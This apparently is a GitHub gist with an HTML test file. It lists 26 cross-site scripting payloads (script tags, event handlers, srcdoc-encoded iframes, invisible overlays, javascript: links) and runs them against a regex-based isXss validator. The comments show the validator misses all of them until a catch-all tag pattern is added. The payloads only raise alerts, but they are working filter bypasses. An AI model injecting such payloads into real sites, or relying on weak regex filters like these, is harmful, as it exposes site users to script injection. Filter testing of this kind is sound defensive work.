Skip to content

Instantly share code, notes, and snippets.

@cianmce
Created March 26, 2018 22:18
Show Gist options
  • Save cianmce/5a5ca7644a05f27e79bb484458ab83ef to your computer and use it in GitHub Desktop.
Save cianmce/5a5ca7644a05f27e79bb484458ab83ef to your computer and use it in GitHub Desktop.
<html>
<script>
var xsss = [
'<script >alert("XSS - 1");</script >',
'<script type="application/javascript">alert("XSS - 2");</script >',
'<script src="https://rawgit.com/cianmce/bc4ede289eba9eb34c5ef499ac3298eb/raw/1d80cdd168bdc4389ed011d41ecca4242ca633e8/xss-alert.js?msg=XSS - 3"></script >',
'<meta http-equiv="refresh" content="0;URL=https://httpbin.org/get?xss=XSS - 4" />',
'<input type="image" src onerror="alert(\"XSS - 5\")">',
'<object data="a.a" onerror="alert(\"XSS - 6\")" />',
'<object data="a.a" onerror="alert(\"XSS - 7\")">',
'<link data="a.a" onerror="alert(\"XSS - 8\")">',
'<input onfocus="console.log(\"XSS - 9\")" autofocus> // Uses console.log as "alert" will cause infinate loop',
'<video ><source onerror="alert(\"XSS - 10\")" >',
'<iframe srcdoc="&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;alert(\"XSS - 11\")&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62;">',
'<iframe srcdoc="&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;alert(\"XSS - 12\")&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62;" />',
'<iframe srcdoc="&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;alert(\"XSS - 13\")&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62;"></iframe >',
'<iframe style="display:none;" src="https://rawgit.com/cianmce/774471fbcffd4e31a950fbffa9b9a4d0/raw/7d68ac13ae3cca900ae3cec7cb21cf1f1c36d957/alert.html?msg=XSS - 14"></iframe >',
'<iframe style="display:none;" src="https://rawgit.com/cianmce/774471fbcffd4e31a950fbffa9b9a4d0/raw/7d68ac13ae3cca900ae3cec7cb21cf1f1c36d957/alert.html?msg=XSS - 15">',
'<iframe style="display:none;" src="//a.a" onload="alert(\"XSS - 16\");"></iframe >',
'<div style="opacity: 0; width:100%; height:100%; position:absolute; top:0px; left:0px; z-index:9999" onmousemove="alert(\"XSS - 17\")"></div >',
'<p style="opacity: 0; width:100%; height:100%; position:absolute; top:0px; left:0px; z-index:9999" onmousemove="alert(\"XSS - 18\")">',
'<frameset onload="alert(\"XSS - 19\")"><frame onload="Limited support"></frameset >',
'<a href="javascript:alert(\"XSS - 20\")" style="text-decoration: none; color:#000;" > ',
'<a onclick="alert(\"XSS - 21\")" style="text-decoration: none; color:#000;" > ',
'<a onmouseover="alert(\"XSS - 22\")" style="text-decoration: none; color:#000;" > ',
'<body onunload="alert(\"XSS - 23\")">',
'<body onresize="alert(\"XSS - 24\");">',
'<body onload="alert(\"XSS - 25\")">',
'<body style="opacity:0; pointer-events: none; filter: alpha(opacity=0);">',
]
const xssSimple = new RegExp('((%3C)|<)((%2F)|/)*[a-z0-9%]+((%3E)|>)', 'i')
const xssImgSrc = new RegExp('((%3C)|<)((%69)|i|(%49))((%6D)|m|(%4D))((%67)|g|(%47))[^\n]+((%3E)|>)', 'i')
const xssAnyTag = new RegExp('<(|\/|[^\/>][^>]+|\/[^>][^>]+)>')
// Current isXss function
function isXss (value) {
return xssSimple.test(value) || xssImgSrc.test(value)
}
// prints false for all
for(var i in xsss){
console.log( isXss(xsss[i]) + ": isXss(`" + xsss[i] + "`)");
}
// Current isXss function that also checks for any tags
function isXss (value) {
return xssSimple.test(value) || xssImgSrc.test(value) || xssAnyTag.test(value)
}
// prints true for all
for(var i in xsss){
console.log( isXss(xsss[i]) + ": isXss(`" + xsss[i] + "`)");
}
</script>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment